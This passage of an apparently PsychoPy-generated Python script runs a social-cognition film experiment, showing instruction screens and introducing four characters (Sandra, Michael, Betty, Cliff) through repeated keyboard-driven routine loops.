the Builder filename that created this script\nexpInfo = {'participant':'','group':'pilot', 'session':'001'}\ndlg = gui.DlgFromDict(dictionary=expInfo, title=expName)\nif dlg.OK == False: core.quit() # user pressed cancel\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\nexpInfo['expName'] = expName\n\n# Setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') # if this fails (e.g. permissions) we will get error\nfilename = 'data' + os.path.sep + '%s_%s_%s' %(expInfo['group'], expInfo['participant'], expInfo['session'])\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\n\n# An ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=True,\n dataFileName=filename)\n\n# Start Code - component code to be run before the window creation\n\n# Setup the Window\nwin = visual.Window(size=(1440, 900), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor='testMonitor', color='black', colorSpace='rgb')\n# store frame rate of monitor if we can measure it successfully\nexpInfo['frameRate']=win.getActualFrameRate()\nif expInfo['frameRate']!=None:\n frameDur = 1.0/round(expInfo['frameRate'])\nelse:\n frameDur = 1.0/60.0 # couldn't get a reliable measure so guess\n\n# Initialize components for Routine \"instr1\"\ninstr1Clock = core.Clock()\ninstructions1 = visual.TextStim(win=win, ori=0, name='instructions1',\n text='You will be watching a 15 minute film. Please watch very carefully and try to understand what each character is feeling or thinking.', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.3,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr2\"\ninstr2Clock = core.Clock()\ninstructions2 = visual.TextStim(win=win, ori=0, name='instructions2',\n text='Now, you will meet each character.', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"char1\"\nchar1Clock = core.Clock()\ncharacter1 = visual.TextStim(win=win, ori=0, name='character1',\n text='This is Sandra', font='Arial',\n pos=[0, 0.7], height=0.1, wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\nimage_char1 = visual.PatchStim(win=win, name='image_char1',units='pix', \n tex='pictures/sandra.png', mask=None,\n ori=0, pos=[0, -30], size=[580, 450],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-2.0)\n\n# Initialize components for Routine \"char2\"\nchar2Clock = core.Clock()\ncharacter2 = visual.TextStim(win=win, ori=0, name='character2',\n text='This is Michael', font='Arial',\n pos=[0, 0.7], height=0.1, wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\nimage_char2 = visual.PatchStim(win=win, name='image_char2',units='pix', \n tex='pictures/michael.png', mask=None,\n ori=0, pos=[0, -30], size=[580, 450],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-2.0)\n\n# Initialize components for Routine \"char3\"\nchar3Clock = core.Clock()\ncharacter3 = visual.TextStim(win=win, ori=0, name='character3',\n text='This is Betty', font='Arial',\n pos=[0, 0.7], height=0.1, wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\nimage_char3 = visual.PatchStim(win=win, name='image_char3',units='pix', \n tex='pictures/betty.png', mask=None,\n ori=0, pos=[0, -30], size=[580, 450],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-2.0)\n\n# Initialize components for Routine \"char4\"\nchar4Clock = core.Clock()\ncharacter4 = visual.TextStim(win=win, ori=0, name='character4',\n text='This is Cliff', font='Arial',\n pos=[0, 0.7], height=0.1, wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\nimage_char4 = visual.PatchStim(win=win, name='image_char4',units='pix', \n tex='pictures/cliff.png', mask=None,\n ori=0, pos=[0, -30], size=[580, 450],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-2.0)\n\n# Initialize components for Routine \"instr3\"\ninstr3Clock = core.Clock()\ninstructions3 = visual.TextStim(win=win, ori=0, name='instructions3',\n text='The file shows these four people getting together for a Saturday evening.', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.3,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr4\"\ninstr4Clock = core.Clock()\ninstructions4 = visual.TextStim(win=win, ori=0, name='instructions4',\n text='The movie will be stopped at various points and some questions will be asked. All of the answers are multiple choice and require one option to be selected from a choice of four. If you are not exactly sure of the correct answer, please guess.', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.3,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr5\"\ninstr5Clock = core.Clock()\ninstructions5 = visual.TextStim(win=win, ori=0, name='instructions5',\n text='When you answer, try to imagine what the characters are feeling or thinking at the very moment the film is stopped.', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.3,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr6\"\ninstr6Clock = core.Clock()\ninstructions6 = visual.TextStim(win=win, ori=0, name='instructions6',\n text='The first scene is about to start.\\r\\n\\r\\nAre you ready?\\r\\n\\r\\nAgain, please watch very carefully because each scene will be presented only once.', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.3,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"vid\"\nvidClock = core.Clock()\n\n# Initialize components for Routine \"quest\"\nquestClock = core.Clock()\nimage = visual.PatchStim(win=win, name='image',units='pix', \n tex='sin', mask=None,\n ori=0, pos=[0, 0], size=[1280, 800],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\n\n# Initialize components for Routine \"end\"\nendClock = core.Clock()\nthanks = visual.TextStim(win=win, ori=0, name='thanks',\n text='Thank you for your participation!', font='Arial',\n pos=[0, 0], height=0.1, wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n# Create some handy timers\nglobalClock = core.Clock() # to track the time since experiment started\nroutineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine \"instr1\"-------\nt = 0\ninstr1Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr1 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr1.status = NOT_STARTED\n# keep track of which components have finished\ninstr1Components = []\ninstr1Components.append(instructions1)\ninstr1Components.append(key_resp_instr1)\nfor thisComponent in instr1Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr1\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr1Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions1* updates\n if t >= 0.0 and instructions1.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions1.tStart = t # underestimates by a little under one frame\n instructions1.frameNStart = frameN # exact frame index\n instructions1.setAutoDraw(True)\n \n # *key_resp_instr1* updates\n if t >= 0.0 and key_resp_instr1.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr1.tStart = t # underestimates by a little under one frame\n key_resp_instr1.frameNStart = frameN # exact frame index\n key_resp_instr1.status = STARTED\n # keyboard checking is just starting\n key_resp_instr1.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr1.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr1.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr1.rt = key_resp_instr1.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr1Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr1\"-------\nfor thisComponent in instr1Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr2\"-------\nt = 0\ninstr2Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr2 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr2.status = NOT_STARTED\n# keep track of which components have finished\ninstr2Components = []\ninstr2Components.append(instructions2)\ninstr2Components.append(key_resp_instr2)\nfor thisComponent in instr2Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr2\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr2Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions2* updates\n if t >= 0.0 and instructions2.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions2.tStart = t # underestimates by a little under one frame\n instructions2.frameNStart = frameN # exact frame index\n instructions2.setAutoDraw(True)\n \n # *key_resp_instr2* updates\n if t >= 0.0 and key_resp_instr2.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr2.tStart = t # underestimates by a little under one frame\n key_resp_instr2.frameNStart = frameN # exact frame index\n key_resp_instr2.status = STARTED\n # keyboard checking is just starting\n key_resp_instr2.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr2.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr2.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr2.rt = key_resp_instr2.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr2Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr2\"-------\nfor thisComponent in instr2Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"char1\"-------\nt = 0\nchar1Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_char1 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_char1.status = NOT_STARTED\n# keep track of which components have finished\nchar1Components = []\nchar1Components.append(character1)\nchar1Components.append(key_resp_char1)\nchar1Components.append(image_char1)\nfor thisComponent in char1Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"char1\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = char1Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *character1* updates\n if t >= 0.0 and character1.status == NOT_STARTED:\n # keep track of start time/frame for later\n character1.tStart = t # underestimates by a little under one frame\n character1.frameNStart = frameN # exact frame index\n character1.setAutoDraw(True)\n \n # *key_resp_char1* updates\n if t >= 0.0 and key_resp_char1.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_char1.tStart = t # underestimates by a little under one frame\n key_resp_char1.frameNStart = frameN # exact frame index\n key_resp_char1.status = STARTED\n # keyboard checking is just starting\n key_resp_char1.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_char1.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_char1.keys = theseKeys[-1] # just the last key pressed\n key_resp_char1.rt = key_resp_char1.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # *image_char1* updates\n if t >= 0.0 and image_char1.status == NOT_STARTED:\n # keep track of start time/frame for later\n image_char1.tStart = t # underestimates by a little under one frame\n image_char1.frameNStart = frameN # exact frame index\n image_char1.setAutoDraw(True)\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in char1Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"char1\"-------\nfor thisComponent in char1Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"char2\"-------\nt = 0\nchar2Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_char2 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_char2.status = NOT_STARTED\n# keep track of which components have finished\nchar2Components = []\nchar2Components.append(character2)\nchar2Components.append(key_resp_char2)\nchar2Components.append(image_char2)\nfor thisComponent in char2Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"char2\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = char2Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *character2* updates\n if t >= 0.0 and character2.status == NOT_STARTED:\n # keep track of start time/frame for later\n character2.tStart = t # underestimates by a little under one frame\n character2.frameNStart = frameN # exact frame index\n character2.setAutoDraw(True)\n \n # *key_resp_char2* updates\n if t >= 0.0 and key_resp_char2.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_char2.tStart = t # underestimates by a little under one frame\n key_resp_char2.frameNStart = frameN # exact frame index\n key_resp_char2.status = STARTED\n # keyboard checking is just starting\n key_resp_char2.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_char2.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_char2.keys = theseKeys[-1] # just the last key pressed\n key_resp_char2.rt = key_resp_char2.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # *image_char2* updates\n if t >= 0.0 and image_char2.status == NOT_STARTED:\n # keep track of start time/frame for later\n image_char2.tStart = t # underestimates by a little under one frame\n image_char2.frameNStart = frameN # exact frame index\n image_char2.setAutoDraw(True)\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in char2Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"char2\"-------\nfor thisComponent in char2Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"char3\"-------\nt = 0\nchar3Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_char3 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_char3.status = NOT_STARTED\n# keep track of which components have finished\nchar3Components = []\nchar3Components.append(character3)\nchar3Components.append(key_resp_char3)\nchar3Components.append(image_char3)\nfor thisComponent in char3Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"char3\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = char3Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *character3* updates\n if t >= 0.0 and character3.status == NOT_STARTED:\n # keep track of start time/frame for later\n character3.tStart = t # underestimates by a little under one frame\n character3.frameNStart = frameN # exact frame index\n character3.setAutoDraw(True)\n \n # *key_resp_char3* updates\n if t >= 0.0 and key_resp_char3.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_char3.tStart = t # underestimates by a little under one frame\n key_resp_char3.frameNStart = frameN # exact frame index\n key_resp_char3.status = STARTED\n # keyboard checking is just starting\n key_resp_char3.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_char3.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_char3.keys = theseKeys[-1] # just the last key pressed\n key_resp_char3.rt = key_resp_char3.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # *image_char3* updates\n if t >= 0.0 and image_char3.status == NOT_STARTED:\n # keep track of start time/frame for later\n image_char3.tStart = t # underestimates by a little under one frame\n image_char3.frameNStart = frameN # exact frame index\n image_char3.setAutoDraw(True)\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in char3Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"char3\"-------\nfor thisComponent in char3Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"char4\"-------\nt = 0\nchar4Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_char4 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_char4.status = NOT_STARTED\n# keep track of which components have finished\nchar4Components = []\nchar4Components.append(character4)\nchar4Components.append(key_resp_char4)\nchar4Components.append(image_char4)\nfor thisComponent in char4Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"char4\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = char4Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *character4* updates\n if t >= 0.0 and character4.status == NOT_STARTED:\n # keep track of start time/frame for later\n character4.tStart = t # underestimates by a little under one frame\n character4.frameNStart = frameN # exact frame index\n character4.setAutoDraw(True)\n \n # *key_resp_char4* updates\n if t >= 0.0 and key_resp_char4.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_char4.tStart = t # underestimates by a little under one frame\n key_resp_char4.frameNStart = frameN # exact frame index\n key_resp_char4.status = STARTED\n # keyboard checking is just starting\n key_resp_char4.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_char4.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_char4.keys = theseKeys[-1] # just the last key pressed\n key_resp_char4.rt = key_resp_char4.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # *image_char4* updates\n if t >= 0.0 and image_char4.status == NOT_STARTED:\n # keep track of start time/frame for later\n image_char4.tStart = t # underestimates by a little under one frame\n image_char4.frameNStart = frameN # exact frame index\n image_char4.setAutoDraw(True)\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in char4Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"char4\"-------\nfor thisComponent in char4Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr3\"-------\nt = 0\ninstr3Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr3 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr3.status = NOT_STARTED\n# keep track of which components have finished\ninstr3Components = []\ninstr3Components.append(instructions3)\ninstr3Components.append(key_resp_instr3)\nfor thisComponent in instr3Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr3\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr3Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions3* updates\n if t >= 0.0 and instructions3.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions3.tStart = t # underestimates by a little under one frame\n instructions3.frameNStart = frameN # exact frame index\n instructions3.setAutoDraw(True)\n \n # *key_resp_instr3* updates\n if t >= 0.0 and key_resp_instr3.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr3.tStart = t # underestimates by a little under one frame\n key_resp_instr3.frameNStart = frameN # exact frame index\n key_resp_instr3.status = STARTED\n # keyboard checking is just starting\n key_resp_instr3.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr3.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr3.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr3.rt = key_resp_instr3.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr3Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr3\"-------\nfor thisComponent in instr3Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr4\"-------\nt = 0\ninstr4Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr4 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr4.status = NOT_STARTED\n# keep track of which components have finished\ninstr4Components = []\ninstr4Components.append(instructions4)\ninstr4Components.append(key_resp_instr4)\nfor thisComponent in instr4Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr4\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr4Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions4* updates\n if t >= 0.0 and instructions4.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions4.tStart = t # underestimates by a little under one frame\n instructions4.frameNStart = frameN # exact frame index\n instructions4.setAutoDraw(True)\n \n # *key_resp_instr4* updates\n if t >= 0.0 and key_resp_instr4.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr4.tStart = t # underestimates by a little under one frame\n key_resp_instr4.frameNStart = frameN # exact frame index\n key_resp_instr4.status = STARTED\n # keyboard checking is just starting\n key_resp_instr4.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr4.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr4.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr4.rt = key_resp_instr4.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr4Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr4\"-------\nfor thisComponent in instr4Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr5\"-------\nt = 0\ninstr5Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr5 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr5.status = NOT_STARTED\n# keep track of which components have finished\ninstr5Components = []\ninstr5Components.append(instructions5)\ninstr5Components.append(key_resp_instr5)\nfor thisComponent in instr5Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr5\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr5Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions5* updates\n if t >= 0.0 and instructions5.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions5.tStart = t # underestimates by a little under one frame\n instructions5.frameNStart = frameN # exact frame index\n instructions5.setAutoDraw(True)\n \n # *key_resp_instr5* updates\n if t >= 0.0 and key_resp_instr5.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr5.tStart = t # underestimates by a little under one frame\n key_resp_instr5.frameNStart = frameN # exact frame index\n key_resp_instr5.status = STARTED\n # keyboard checking is just starting\n key_resp_instr5.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr5.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr5.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr5.rt = key_resp_instr5.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr5Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr5\"-------\nfor thisComponent in instr5Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr6\"-------\nt = 0\ninstr6Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr6 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr6.status = NOT_STARTED\n# keep track of which components have finished\ninstr6Components = []\ninstr6Components.append(instructions6)\ninstr6Components.append(key_resp_instr6)\nfor thisComponent in instr6Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr6\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr6Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions6* updates\n if t >= 0.0 and instructions6.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions6.tStart = t # underestimates by a little under one frame\n instructions6.frameNStart = frameN # exact frame index\n instructions6.setAutoDraw(True)\n \n # *key_resp_instr6* updates\n if t >= 0.0 and key_resp_instr6.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr6.tStart = t # underestimates by a little under one frame\n key_resp_instr6.frameNStart = frameN # exact frame index\n key_resp_instr6.status = STARTED\n # keyboard checking is just starting\n key_resp_instr6.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr6.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr6.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr6.rt = key_resp_instr6.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr6Components:\n if hasattr(thisComponent, \"status\") and 